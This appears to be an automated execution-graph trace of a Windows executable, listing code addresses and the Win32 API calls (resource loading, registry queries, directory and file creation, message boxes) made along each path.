                                                                                                                                                                      execution_graph 4982 409c40 5023 4030dc 4982->5023 4984 409c56 5026 4042e8 4984->5026 4986 409c5b 5029 40457c GetModuleHandleA GetProcAddress 4986->5029 4992 409c6a 5046 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 4992->5046 5009 409d43 5108 4074a0 5009->5108 5011 409d05 5011->5009 5141 409aa0 5011->5141 5012 409d84 5112 407a28 5012->5112 5013 409d69 5013->5012 5014 409aa0 4 API calls 5013->5014 5014->5012 5016 409da9 5122 408b08 5016->5122 5020 409def 5021 408b08 21 API calls 5020->5021 5022 409e28 5020->5022 5021->5020 5151 403094 5023->5151 5025 4030e1 GetModuleHandleA GetCommandLineA 5025->4984 5028 404323 5026->5028 5152 403154 5026->5152 5028->4986 5030 404598 5029->5030 5031 40459f GetProcAddress 5029->5031 5030->5031 5032 4045b5 GetProcAddress 5031->5032 5033 4045ae 5031->5033 5034 4045c4 SetProcessDEPPolicy 5032->5034 5035 4045c8 5032->5035 5033->5032 5034->5035 5036 4065b8 5035->5036 5165 405c98 5036->5165 5045 406604 702B1CD0 5045->4992 5047 4090f7 5046->5047 5292 406fa0 SetErrorMode 5047->5292 5052 403198 4 API calls 5053 40913c 5052->5053 5054 409b30 GetSystemInfo VirtualQuery 5053->5054 5055 409be4 5054->5055 5058 409b5a 5054->5058 5060 409768 5055->5060 5056 409bc5 VirtualQuery 5056->5055 5056->5058 5057 409b84 VirtualProtect 5057->5058 5058->5055 5058->5056 5058->5057 5059 409bb3 VirtualProtect 5058->5059 5059->5056 5302 406bd0 GetCommandLineA 5060->5302 5062 409825 5064 4031b8 4 API calls 5062->5064 5063 406c2c 6 API calls 5067 409785 5063->5067 5065 40983f 5064->5065 5068 406c2c 5065->5068 5066 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5066->5067 5067->5062 5067->5063 5067->5066 5069 406c53 GetModuleFileNameA 5068->5069 5070 406c77 GetCommandLineA 5068->5070 5071 403278 4 API calls 5069->5071 5072 406c7c 5070->5072 5073 406c75 5071->5073 5074 406c81 5072->5074 5075 406af0 4 API calls 5072->5075 5078 406c89 5072->5078 5076 406ca4 5073->5076 5077 403198 4 API calls 5074->5077 5075->5072 5079 403198 4 API calls 5076->5079 5077->5078 5080 40322c 4 API calls 5078->5080 5081 406cb9 5079->5081 5080->5076 5082 4031e8 5081->5082 5083 4031ec 5082->5083 5084 4031fc 5082->5084 5083->5084 5086 403254 4 API calls 5083->5086 5085 403228 5084->5085 5087 4025ac 4 API calls 5084->5087 5088 4074e0 5085->5088 5086->5084 5087->5085 5089 4074ea 5088->5089 5323 407576 5089->5323 5326 407578 5089->5326 5090 407516 5091 40752a 5090->5091 5329 40748c GetLastError 5090->5329 5095 409bec FindResourceA 5091->5095 5096 409c01 5095->5096 5097 409c06 SizeofResource 5095->5097 5098 409aa0 4 API calls 5096->5098 5099 409c13 5097->5099 5100 409c18 LoadResource 5097->5100 5098->5097 5101 409aa0 4 API calls 5099->5101 5102 409c26 5100->5102 5103 409c2b LockResource 5100->5103 5101->5100 5104 409aa0 4 API calls 5102->5104 5105 409c37 5103->5105 5106 409c3c 5103->5106 5104->5103 5107 409aa0 4 API calls 5105->5107 5106->5011 5138 407918 5106->5138 5107->5106 5109 4074b4 5108->5109 5110 4074c4 5109->5110 5111 4073ec 20 API calls 5109->5111 5110->5013 5111->5110 5113 407a35 5112->5113 5114 405880 4 API calls 5113->5114 5115 407a89 5113->5115 5114->5115 5116 407918 InterlockedExchange 5115->5116 5117 407a9b 5116->5117 5118 405880 4 API calls 5117->5118 5119 407ab1 5117->5119 5118->5119 5120 405880 4 API calls 5119->5120 5121 407af4 5119->5121 5120->5121 5121->5016 5131 408b82 5122->5131 5135 408b39 5122->5135 5123 408bcd 5437 407cb8 5123->5437 5125 408be4 5128 4031b8 4 API calls 5125->5128 5127 4034f0 4 API calls 5127->5131 5130 408bfe 5128->5130 5129 4031e8 4 API calls 5129->5135 5148 404c10 5130->5148 5131->5123 5131->5127 5133 403420 4 API calls 5131->5133 5134 4031e8 4 API calls 5131->5134 5137 407cb8 21 API calls 5131->5137 5132 403420 4 API calls 5132->5135 5133->5131 5134->5131 5135->5129 5135->5131 5135->5132 5136 407cb8 21 API calls 5135->5136 5428 4034f0 5135->5428 5136->5135 5137->5131 5463 4078c4 5138->5463 5142 409ac1 5141->5142 5143 409aa9 5141->5143 5144 405880 4 API calls 5142->5144 5145 405880 4 API calls 5143->5145 5146 409ad2 5144->5146 5147 409abb 5145->5147 5146->5009 5147->5009 5149 402594 4 API calls 5148->5149 5150 404c1b 5149->5150 5150->5020 5151->5025 5153 403164 5152->5153 5154 40318c TlsGetValue 5152->5154 5153->5028 5155 403196 5154->5155 5156 40316f 5154->5156 5155->5028 5160 40310c 5156->5160 5158 403174 TlsGetValue 5159 403184 5158->5159 5159->5028 5161 403120 LocalAlloc 5160->5161 5162 403116 5160->5162 5163 40313e TlsSetValue 5161->5163 5164 403132 5161->5164 5162->5161 5163->5164 5164->5158 5237 405930 5165->5237 5168 405270 GetSystemDefaultLCID 5171 4052a6 5168->5171 5169 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5169->5171 5170 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5170->5171 5171->5169 5171->5170 5172 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5171->5172 5173 405308 5171->5173 5172->5171 5174 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5173->5174 5175 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5173->5175 5176 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5173->5176 5177 40538b 5173->5177 5174->5173 5175->5173 5176->5173 5270 4031b8 5177->5270 5180 4053b4 GetSystemDefaultLCID 5274 4051fc GetLocaleInfoA 5180->5274 5183 4031e8 4 API calls 5184 4053f4 5183->5184 5185 4051fc 5 API calls 5184->5185 5186 405409 5185->5186 5187 4051fc 5 API calls 5186->5187 5188 40542d 5187->5188 5280 405248 GetLocaleInfoA 5188->5280 5191 405248 GetLocaleInfoA 5192 40545d 5191->5192 5193 4051fc 5 API calls 5192->5193 5194 405477 5193->5194 5195 405248 GetLocaleInfoA 5194->5195 5196 405494 5195->5196 5197 4051fc 5 API calls 5196->5197 5198 4054ae 5197->5198 5199 4031e8 4 API calls 5198->5199 5200 4054bb 5199->5200 5201 4051fc 5 API calls 5200->5201 5202 4054d0 5201->5202 5203 4031e8 4 API calls 5202->5203 5204 4054dd 5203->5204 5205 405248 GetLocaleInfoA 5204->5205 5206 4054eb 5205->5206 5207 4051fc 5 API calls 5206->5207 5208 405505 5207->5208 5209 4031e8 4 API calls 5208->5209 5210 405512 5209->5210 5211 4051fc 5 API calls 5210->5211 5212 405527 5211->5212 5213 4031e8 4 API calls 5212->5213 5214 405534 5213->5214 5215 4051fc 5 API calls 5214->5215 5216 405549 5215->5216 5217 405566 5216->5217 5218 405557 5216->5218 5220 40322c 4 API calls 5217->5220 5288 40322c 5218->5288 5221 405564 5220->5221 5222 4051fc 5 API calls 5221->5222 5223 405588 5222->5223 5224 4055a5 5223->5224 5225 405596 5223->5225 5226 403198 4 API calls 5224->5226 5227 40322c 4 API calls 5225->5227 5228 4055a3 5226->5228 5227->5228 5282 4033b4 5228->5282 5230 4055c7 5231 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5230->5231 5232 4055e1 5231->5232 5233 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5232->5233 5234 4055fb 5233->5234 5235 405ce4 GetVersionExA 5234->5235 5236 405cfb 5235->5236 5236->5045 5238 40593c 5237->5238 5245 404ccc LoadStringA 5238->5245 5241 4031e8 4 API calls 5242 40596d 5241->5242 5248 403198 5242->5248 5252 403278 5245->5252 5249 4031b7 5248->5249 5250 40319e 5248->5250 5249->5168 5250->5249 5266 4025ac 5250->5266 5257 403254 5252->5257 5254 403288 5255 403198 4 API calls 5254->5255 5256 4032a0 5255->5256 5256->5241 5258 403274 5257->5258 5259 403258 5257->5259 5258->5254 5262 402594 5259->5262 5261 403261 5261->5254 5263 402598 5262->5263 5264 4025a2 5262->5264 5263->5264 5265 403154 4 API calls 5263->5265 5264->5261 5264->5264 5265->5264 5267 4025b0 5266->5267 5268 4025ba 5266->5268 5267->5268 5269 403154 4 API calls 5267->5269 5268->5249 5269->5268 5272 4031be 5270->5272 5271 4031e3 5271->5180 5272->5271 5273 4025ac 4 API calls 5272->5273 5273->5272 5275 405223 5274->5275 5276 405235 5274->5276 5278 403278 4 API calls 5275->5278 5277 40322c 4 API calls 5276->5277 5279 405233 5277->5279 5278->5279 5279->5183 5281 405264 5280->5281 5281->5191 5283 4033bc 5282->5283 5284 403254 4 API calls 5283->5284 5285 4033cf 5284->5285 5286 4031e8 4 API calls 5285->5286 5287 4033f7 5286->5287 5290 403230 5288->5290 5289 403252 5289->5221 5290->5289 5291 4025ac 4 API calls 5290->5291 5291->5289 5300 403414 5292->5300 5295 406fee 5296 407284 FormatMessageA 5295->5296 5297 4072aa 5296->5297 5298 403278 4 API calls 5297->5298 5299 4072c7 5298->5299 5299->5052 5301 403418 LoadLibraryA 5300->5301 5301->5295 5309 406af0 5302->5309 5304 406bf3 5305 406c05 5304->5305 5306 406af0 4 API calls 5304->5306 5307 403198 4 API calls 5305->5307 5306->5304 5308 406c1a 5307->5308 5308->5067 5310 406b1c 5309->5310 5311 403278 4 API calls 5310->5311 5312 406b29 5311->5312 5319 403420 5312->5319 5314 406b31 5315 4031e8 4 API calls 5314->5315 5316 406b49 5315->5316 5317 403198 4 API calls 5316->5317 5318 406b6b 5317->5318 5318->5304 5320 403426 5319->5320 5322 403437 5319->5322 5321 403254 4 API calls 5320->5321 5320->5322 5321->5322 5322->5314 5324 407578 5323->5324 5325 4075b7 CreateFileA 5324->5325 5325->5090 5327 403414 5326->5327 5328 4075b7 CreateFileA 5327->5328 5328->5090 5332 4073ec 5329->5332 5333 407284 5 API calls 5332->5333 5334 407414 5333->5334 5335 407434 5334->5335 5341 405184 5334->5341 5344 405880 5335->5344 5338 407443 5339 403198 4 API calls 5338->5339 5340 407460 5339->5340 5340->5091 5348 405198 5341->5348 5345 405887 5344->5345 5346 4031e8 4 API calls 5345->5346 5347 40589f 5346->5347 5347->5338 5349 4051b5 5348->5349 5356 404e48 5349->5356 5352 4051e1 5354 403278 4 API calls 5352->5354 5355 405193 5354->5355 5355->5335 5359 404e63 5356->5359 5357 404e75 5357->5352 5361 404bd4 5357->5361 5359->5357 5364 404f6a 5359->5364 5371 404e3c 5359->5371 5362 405930 5 API calls 5361->5362 5363 404be5 5362->5363 5363->5352 5365 404f7b 5364->5365 5368 404fc9 5364->5368 5367 40504f 5365->5367 5365->5368 5370 404fe7 5367->5370 5378 404e28 5367->5378 5368->5370 5374 404de4 5368->5374 5370->5359 5372 403198 4 API calls 5371->5372 5373 404e46 5372->5373 5373->5359 5375 404df2 5374->5375 5381 404bec 5375->5381 5377 404e20 5377->5368 5394 4039a4 5378->5394 5384 4059a0 5381->5384 5383 404c05 5383->5377 5385 4059ae 5384->5385 5386 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5385->5386 5387 4059d8 5386->5387 5388 405184 19 API calls 5387->5388 5389 4059e6 5388->5389 5390 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5389->5390 5391 4059f1 5390->5391 5392 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5391->5392 5393 405a0b 5392->5393 5393->5383 5395 4039ab 5394->5395 5400 4038b4 5395->5400 5397 4039cb 5398 403198 4 API calls 5397->5398 5399 4039d2 5398->5399 5399->5370 5401 4038d5 5400->5401 5402 4038c8 5400->5402 5404 403934 5401->5404 5405 4038db 5401->5405 5403 403780 6 API calls 5402->5403 5408 4038d0 5403->5408 5406 403993 5404->5406 5407 40393b 5404->5407 5409 4038e1 5405->5409 5410 4038ee 5405->5410 5411 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5406->5411 5412 403941 5407->5412 5413 40394b 5407->5413 5408->5397 5414 403894 6 API calls 5409->5414 5415 403894 6 API calls 5410->5415 5411->5408 5416 403864 9 API calls 5412->5416 5417 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5413->5417 5414->5408 5418 4038fc 5415->5418 5416->5408 5419 40395d 5417->5419 5420 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5418->5420 5422 403864 9 API calls 5419->5422 5421 403917 5420->5421 5424 40374c VariantClear 5421->5424 5423 403976 5422->5423 5426 40374c VariantClear 5423->5426 5425 40392c 5424->5425 5425->5397 5427 40398b 5426->5427 5427->5397 5429 4034fd 5428->5429 5435 40352d 5428->5435 5431 403526 5429->5431 5433 403509 5429->5433 5430 403198 4 API calls 5436 403517 5430->5436 5432 403254 4 API calls 5431->5432 5432->5435 5443 4025c4 5433->5443 5435->5430 5436->5135 5438 407cd3 5437->5438 5442 407cc8 5437->5442 5447 407c5c 5438->5447 5441 405880 4 API calls 5441->5442 5442->5125 5444 4025ca 5443->5444 5445 4025dc 5444->5445 5446 403154 4 API calls 5444->5446 5445->5436 5445->5445 5446->5445 5448 407c70 5447->5448 5449 407caf 5447->5449 5448->5449 5451 407bac 5448->5451 5449->5441 5449->5442 5452 407bb7 5451->5452 5453 407bc8 5451->5453 5455 405880 4 API calls 5452->5455 5454 4074a0 20 API calls 5453->5454 5456 407bdc 5454->5456 5455->5453 5457 4074a0 20 API calls 5456->5457 5458 407bfd 5457->5458 5459 407918 InterlockedExchange 5458->5459 5460 407c12 5459->5460 5461 407c28 5460->5461 5462 405880 4 API calls 5460->5462 5461->5448 5462->5461 5464 4078d6 5463->5464 5465 4078e7 5463->5465 5466 4078db InterlockedExchange 5464->5466 5465->5011 5466->5465 6239 409e47 6240 409e6c 6239->6240 6241 4098f4 15 API calls 6240->6241 6244 409e71 6241->6244 6242 409ec4 6273 4026c4 GetSystemTime 6242->6273 6244->6242 6247 408dd8 4 API calls 6244->6247 6245 409ec9 6246 409330 32 API calls 6245->6246 6248 409ed1 6246->6248 6249 409ea0 6247->6249 6250 4031e8 4 API calls 6248->6250 6253 409ea8 MessageBoxA 6249->6253 6251 409ede 6250->6251 6252 406928 5 API calls 6251->6252 6254 409eeb 6252->6254 6253->6242 6255 409eb5 6253->6255 6256 4066c0 5 API calls 6254->6256 6257 405854 5 API calls 6255->6257 6258 409efb 6256->6258 6257->6242 6259 406638 5 API calls 6258->6259 6260 409f0c 6259->6260 6261 403340 4 API calls 6260->6261 6262 409f1a 6261->6262 6263 4031e8 4 API calls 6262->6263 6264 409f2a 6263->6264 6265 4074e0 23 API calls 6264->6265 6266 409f69 6265->6266 6267 402594 4 API calls 6266->6267 6268 409f89 6267->6268 6269 407a28 5 API calls 6268->6269 6270 409fcb 6269->6270 6271 407cb8 21 API calls 6270->6271 6272 409ff2 6271->6272 6273->6245 6200 407548 6201 407554 CloseHandle 6200->6201 6202 40755d 6200->6202 6201->6202 6652 402b48 RaiseException 6203 407749 6204 4076dc WriteFile 6203->6204 6212 407724 6203->6212 6205 4076e8 6204->6205 6206 4076ef 6204->6206 6207 40748c 21 API calls 6205->6207 6208 407700 6206->6208 6209 4073ec 20 API calls 6206->6209 6207->6206 6209->6208 6210 4077e0 6211 4078db InterlockedExchange 6210->6211 6214 407890 6210->6214 6213 4078e7 6211->6213 6212->6203 6212->6210 6653 40294a 6654 402952 6653->6654 6655 402967 6654->6655 6656 403554 4 API calls 6654->6656 6656->6654 6657 403f4a 6658 403f53 6657->6658 6659 403f5c 6657->6659 6661 403f07 6658->6661 6665 403f09 6661->6665 6662 403f3c 6662->6659 6664 403ea9 6673 402674 4 API calls 6664->6673 6674 403ecf 6664->6674 6667 403e9c 6665->6667 6668 403154 4 API calls 6665->6668 6671 403f3d 6665->6671 6684 403e9c 6665->6684 6666 403ef2 6670 402674 4 API calls 6666->6670 6667->6662 6667->6664 6667->6666 6675 403e8e 6667->6675 6668->6665 6670->6674 6671->6659 6673->6674 6674->6659 6676 403e4c 6675->6676 6677 403e67 6676->6677 6678 403e62 6676->6678 6679 403e7b 6676->6679 6682 403e78 6677->6682 6683 402674 4 API calls 6677->6683 6680 403cc8 4 API calls 6678->6680 6681 402674 4 API calls 6679->6681 6680->6677 6681->6682 6682->6664 6682->6666 6683->6682 6685 403ed7 6684->6685 6691 403ea9 6684->6691 6686 403ef2 6685->6686 6688 403e8e 4 API calls 6685->6688 6689 402674 4 API calls 6686->6689 6687 403ecf 6687->6665 6690 403ee6 6688->6690 6689->6687 6690->6686 6690->6691 6691->6687 6692 402674 4 API calls 6691->6692 6692->6687 6701 405150 6702 405163 6701->6702 6703 404e48 19 API calls 6702->6703 6704 405177 6703->6704 6274 403a52 6275 403a74 6274->6275 6276 403a5a WriteFile 6274->6276 6276->6275 6277 403a78 GetLastError 6276->6277 6277->6275 6278 402654 6279 403154 4 API calls 6278->6279 6280 402614 6279->6280 6281 403154 4 API calls 6280->6281 6282 402632 6280->6282 6281->6282 5649 409e62 5650 409aa0 4 API calls 5649->5650 5651 409e67 5650->5651 5652 409e6c 5651->5652 5752 402f24 5651->5752 5686 4098f4 5652->5686 5655 409ec4 5691 4026c4 GetSystemTime 5655->5691 5657 409e71 5657->5655 5757 408dd8 5657->5757 5658 409ec9 5692 409330 5658->5692 5662 409ea0 5666 409ea8 MessageBoxA 5662->5666 5663 4031e8 4 API calls 5664 409ede 5663->5664 5710 406928 5664->5710 5666->5655 5668 409eb5 5666->5668 5760 405854 5668->5760 5673 409f0c 5737 403340 5673->5737 5675 409f1a 5676 4031e8 4 API calls 5675->5676 5677 409f2a 5676->5677 5678 4074e0 23 API calls 5677->5678 5679 409f69 5678->5679 5680 402594 4 API calls 5679->5680 5681 409f89 5680->5681 5682 407a28 5 API calls 5681->5682 5683 409fcb 5682->5683 5684 407cb8 21 API calls 5683->5684 5685 409ff2 5684->5685 5764 40953c 5686->5764 5691->5658 5699 409350 5692->5699 5695 409375 CreateDirectoryA 5696 4093ed 5695->5696 5697 40937f GetLastError 5695->5697 5698 40322c 4 API calls 5696->5698 5697->5699 5700 4093f7 5698->5700 5699->5695 5701 408dd8 4 API calls 5699->5701 5706 407284 5 API calls 5699->5706 5709 405880 4 API calls 5699->5709 5856 406cf4 5699->5856 5879 409224 5699->5879 5898 404c84 5699->5898 5901 408da8 5699->5901 5702 4031b8 4 API calls 5700->5702 5701->5699 5704 409411 5702->5704 5705 4031b8 4 API calls 5704->5705 5707 40941e 5705->5707 5706->5699 5707->5663 5709->5699 6011 406820 5710->6011 5713 403454 4 API calls 5714 40694a 5713->5714 5715 4066c0 5714->5715 6016 4068e4 5715->6016 5718 4066f0 5720 403340 4 API calls 5718->5720 5719 4066fe 5721 403454 4 API calls 5719->5721 5722 4066fc 5720->5722 5723 406711 5721->5723 5725 403198 4 API calls 5722->5725 5724 403340 4 API calls 5723->5724 5724->5722 5726 406733 5725->5726 5727 406638 5726->5727 5728 406642 5727->5728 5729 406665 5727->5729 6022 406950 5728->6022 5731 40322c 4 API calls 5729->5731 5733 40666e 5731->5733 5732 406649 5732->5729 5734 406654 5732->5734 5733->5673 5735 403340 4 API calls 5734->5735 5736 406662 5735->5736 5736->5673 5738 403344 5737->5738 5739 4033a5 5737->5739 5740 4031e8 5738->5740 5741 40334c 5738->5741 5742 4031fc 5740->5742 5744 403254 4 API calls 5740->5744 5741->5739 5745 4031e8 4 API calls 5741->5745 5747 40335b 5741->5747 5743 403228 5742->5743 5748 4025ac 4 API calls 5742->5748 5743->5675 5744->5742 5745->5747 5746 403254 4 API calls 5749 403375 5746->5749 5747->5746 5748->5743 5750 4031e8 4 API calls 5749->5750 5751 4033a1 5750->5751 5751->5675 5753 403154 4 API calls 5752->5753 5754 402f29 5753->5754 6028 402bcc 5754->6028 5756 402f51 5756->5756 5758 408da8 4 API calls 5757->5758 5759 408df4 5758->5759 5759->5662 5761 405859 5760->5761 5762 405930 5 API calls 5761->5762 5763 40586b 5762->5763 5763->5763 5771 40955b 5764->5771 5765 409590 5768 40959d GetUserDefaultLangID 5765->5768 5772 409592 5765->5772 5766 409594 5782 407024 GetModuleHandleA GetProcAddress 5766->5782 5768->5772 5770 40956f 5776 409884 5770->5776 5771->5765 5771->5766 5771->5770 5772->5770 5773 4095cb GetACP 5772->5773 5774 4095ef 5772->5774 5773->5770 5773->5772 5774->5770 5775 409615 GetACP 5774->5775 5775->5770 5775->5774 5777 40988c 5776->5777 5781 4098c6 5776->5781 5778 403420 4 API calls 5777->5778 5777->5781 5779 4098c0 5778->5779 5840 408e80 5779->5840 5781->5657 5783 407067 5782->5783 5784 40705e 5782->5784 5785 407070 5783->5785 5786 4070a8 5783->5786 5795 403198 4 API calls 5784->5795 5803 406f68 5785->5803 5788 406f68 RegOpenKeyExA 5786->5788 5790 4070c1 5788->5790 5789 407089 5791 4070de 5789->5791 5806 406f5c 5789->5806 5790->5791 5792 406f5c 6 API calls 5790->5792 5793 40322c 4 API calls 5791->5793 5796 4070d5 RegCloseKey 5792->5796 5797 4070eb 5793->5797 5799 407120 5795->5799 5796->5791 5809 4032fc 5797->5809 5801 403198 4 API calls 5799->5801 5802 407128 5801->5802 5802->5772 5804 406f73 5803->5804 5805 406f79 RegOpenKeyExA 5803->5805 5804->5805 5805->5789 5823 406e10 5806->5823 5810 403300 5809->5810 5811 40333f 5809->5811 5812 4031e8 5810->5812 5813 40330a 5810->5813 5811->5784 5816 4031fc 5812->5816 5820 403254 4 API calls 5812->5820 5814 403334 5813->5814 5815 40331d 5813->5815 5819 4034f0 4 API calls 5814->5819 5818 4034f0 4 API calls 5815->5818 5817 403228 5816->5817 5821 4025ac 4 API calls 5816->5821 5817->5784 5822 403322 5818->5822 5819->5822 5820->5816 5821->5817 5822->5784 5824 406e36 RegQueryValueExA 5823->5824 5825 406e7b 5824->5825 5830 406e59 5824->5830 5827 403198 4 API calls 5825->5827 5826 406e73 5828 403198 4 API calls 5826->5828 5829 406f47 RegCloseKey 5827->5829 5828->5825 5829->5791 5830->5825 5830->5826 5831 403278 4 API calls 5830->5831 5832 403420 4 API calls 5830->5832 5831->5830 5833 406eb0 RegQueryValueExA 5832->5833 5833->5824 5835 406ecc 5833->5835 5834 4034f0 4 API calls 5836 406f0e 5834->5836 5835->5825 5835->5834 5837 406f20 5836->5837 5839 403420 4 API calls 5836->5839 5838 4031e8 4 API calls 5837->5838 5838->5825 5839->5837 5841 408e8e 5840->5841 5843 408ea6 5841->5843 5853 408e18 5841->5853 5844 408e18 4 API calls 5843->5844 5845 408eca 5843->5845 5844->5845 5846 407918 InterlockedExchange 5845->5846 5847 408ee5 5846->5847 5848 408e18 4 API calls 5847->5848 5850 408ef8 5847->5850 5848->5850 5849 408e18 4 API calls 5849->5850 5850->5849 5851 403278 4 API calls 5850->5851 5852 408f27 5850->5852 5851->5850 5852->5781 5854 405880 4 API calls 5853->5854 5855 408e29 5854->5855 5855->5843 5905 406a58 5856->5905 5859 406d26 5861 406a58 5 API calls 5859->5861 5863 406d72 5859->5863 5862 406d36 5861->5862 5864 406d42 5862->5864 5866 406a34 7 API calls 5862->5866 5913 406888 5863->5913 5864->5863 5869 406a58 5 API calls 5864->5869 5875 406d67 5864->5875 5866->5864 5871 406d5b 5869->5871 5870 406638 5 API calls 5872 406d87 5870->5872 5873 406a34 7 API calls 5871->5873 5871->5875 5874 40322c 4 API calls 5872->5874 5873->5875 5876 406d91 5874->5876 5875->5863 5925 406cc8 GetWindowsDirectoryA 5875->5925 5877 4031b8 4 API calls 5876->5877 5878 406dab 5877->5878 5878->5699 5880 409244 5879->5880 5881 406638 5 API calls 5880->5881 5882 40925d 5881->5882 5883 40322c 4 API calls 5882->5883 5890 409268 5883->5890 5884 406978 6 API calls 5884->5890 5886 408dd8 4 API calls 5886->5890 5887 4033b4 4 API calls 5887->5890 5888 405880 4 API calls 5888->5890 5890->5884 5890->5886 5890->5887 5890->5888 5891 4092e4 5890->5891 5965 4091b0 5890->5965 5973 409034 5890->5973 5892 40322c 4 API calls 5891->5892 5893 4092ef 5892->5893 5894 4031b8 4 API calls 5893->5894 5895 409309 5894->5895 5896 403198 4 API calls 5895->5896 5897 409311 5896->5897 5897->5699 5899 405198 19 API calls 5898->5899 5900 404ca2 5899->5900 5900->5699 5902 408dc8 5901->5902 6001 408c80 5902->6001 5906 4034f0 4 API calls 5905->5906 5908 406a6b 5906->5908 5907 406a82 GetEnvironmentVariableA 5907->5908 5909 406a8e 5907->5909 5908->5907 5912 406a95 5908->5912 5927 406dec 5908->5927 5911 403198 4 API calls 5909->5911 5911->5912 5912->5859 5922 406a34 5912->5922 5914 403414 5913->5914 5915 4068ab GetFullPathNameA 5914->5915 5916 4068b7 5915->5916 5917 4068ce 5915->5917 5916->5917 5918 4068bf 5916->5918 5919 40322c 4 API calls 5917->5919 5920 403278 4 API calls 5918->5920 5921 4068cc 5919->5921 5920->5921 5921->5870 5931 4069dc 5922->5931 5926 406ce9 5925->5926 5926->5863 5928 406dfa 5927->5928 5929 4034f0 4 API calls 5928->5929 5930 406e08 5929->5930 5930->5908 5938 406978 5931->5938 5933 4069fe 5934 406a06 GetFileAttributesA 5933->5934 5935 406a1b 5934->5935 5936 403198 4 API calls 5935->5936 5937 406a23 5936->5937 5937->5859 5948 406744 5938->5948 5940 4069b0 5943 4069c6 5940->5943 5944 4069bb 5940->5944 5942 406989 5942->5940 5955 406970 CharPrevA 5942->5955 5956 403454 5943->5956 5945 40322c 4 API calls 5944->5945 5947 4069c4 5945->5947 5947->5933 5951 406755 5948->5951 5949 4067b9 5950 406680 IsDBCSLeadByte 5949->5950 5952 4067b4 5949->5952 5950->5952 5951->5949 5953 406773 5951->5953 5952->5942 5953->5952 5963 406680 IsDBCSLeadByte 5953->5963 5955->5942 5957 403486 5956->5957 5958 403459 5956->5958 5959 403198 4 API calls 5957->5959 5958->5957 5961 40346d 5958->5961 5960 40347c 5959->5960 5960->5947 5962 403278 4 API calls 5961->5962 5962->5960 5964 406694 5963->5964 5964->5953 5966 403198 4 API calls 5965->5966 5967 4091d1 5966->5967 5970 4091fe 5967->5970 5982 4032a8 5967->5982 5985 403494 5967->5985 5971 403198 4 API calls 5970->5971 5972 409213 5971->5972 5972->5890 5989 408f70 5973->5989 5975 40904a 5976 40904e 5975->5976 5995 406a48 5975->5995 5976->5890 5979 409081 5998 408fac 5979->5998 5983 403278 4 API calls 5982->5983 5984 4032b5 5983->5984 5984->5967 5986 403498 5985->5986 5988 4034c3 5985->5988 5987 4034f0 4 API calls 5986->5987 5987->5988 5988->5967 5990 408f7a 5989->5990 5991 408f7e 5989->5991 5990->5975 5992 408fa0 SetLastError 5991->5992 5993 408f87 Wow64DisableWow64FsRedirection 5991->5993 5994 408f9b 5992->5994 5993->5994 5994->5975 5996 4069dc 7 API calls 5995->5996 5997 406a52 GetLastError 5996->5997 5997->5979 5999 408fb1 Wow64RevertWow64FsRedirection 5998->5999 6000 408fbb 5998->6000 5999->6000 6000->5890 6002 403198 4 API calls 6001->6002 6008 408cb1 6001->6008 6002->6008 6003 408cdc 6004 4031b8 4 API calls 6003->6004 6006 408d69 6004->6006 6005 408cc8 6009 4032fc 4 API calls 6005->6009 6006->5699 6007 403278 4 API calls 6007->6008 6008->6003 6008->6005 6008->6007 6010 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6008->6010 6009->6003 6010->6008 6012 406744 IsDBCSLeadByte 6011->6012 6014 406835 6012->6014 6013 40687f 6013->5713 6014->6013 6015 406680 IsDBCSLeadByte 6014->6015 6015->6014 6017 4068f3 6016->6017 6018 406820 IsDBCSLeadByte 6017->6018 6020 4068fe 6018->6020 6019 4066ea 6019->5718 6019->5719 6020->6019 6021 406680 IsDBCSLeadByte 6020->6021 6021->6020 6023 406957 6022->6023 6024 40695b 6022->6024 6023->5732 6027 406970 CharPrevA 6024->6027 6026 40696c 6026->5732 6027->6026 6029 402bd5 RaiseException 6028->6029 6030 402be6 6028->6030 6029->6030 6030->5756 6283 402e64 6284 402e69 6283->6284 6285 402e7a RtlUnwind 6284->6285 6286 402e5e 6284->6286 6287 402e9d 6285->6287 6304 40667c IsDBCSLeadByte 6305 406694 6304->6305 6717 403f7d 6718 403fa2 6717->6718 6719 403f84 6717->6719 6718->6719 6721 403e8e 4 API calls 6718->6721 6720 403f8c 6719->6720 6722 402674 4 API calls 6719->6722 6721->6719 6723 403fca 6722->6723 6730 403d02 6737 403d12 6730->6737 6731 403ddf ExitProcess 6732 403db8 6734 403cc8 4 API calls 6732->6734 6733 403dea 6735 403dc2 6734->6735 6736 403cc8 4 API calls 6735->6736 6738 403dcc 6736->6738 6737->6731 6737->6732 6737->6733 6737->6737 6740 403da4 6737->6740 6741 403d8f MessageBoxA 6737->6741 6750 4019dc 6738->6750 6746 403fe4 6740->6746 6741->6732 6743 403dd1 6743->6731 6743->6733 6747 403fe8 6746->6747 6748 403f07 4 API calls 6747->6748 6749 404006 6748->6749 6751 401abb 6750->6751 6752 4019ed 6750->6752 6751->6743 6753 401a04 RtlEnterCriticalSection 6752->6753 6754 401a0e LocalFree 6752->6754 6753->6754 6755 401a41 6754->6755 6756 401a2f VirtualFree 6755->6756 6757 401a49 6755->6757 6756->6755 6758 401a70 LocalFree 6757->6758 6759 401a87 6757->6759 6758->6758 6758->6759 6760 401aa9 RtlDeleteCriticalSection 6759->6760 6761 401a9f RtlLeaveCriticalSection 6759->6761 6760->6743 6761->6760 6314 404206 6315 4041cc 6314->6315 6316 40420a 6314->6316 6317 404282 6316->6317 6318 403154 4 API calls 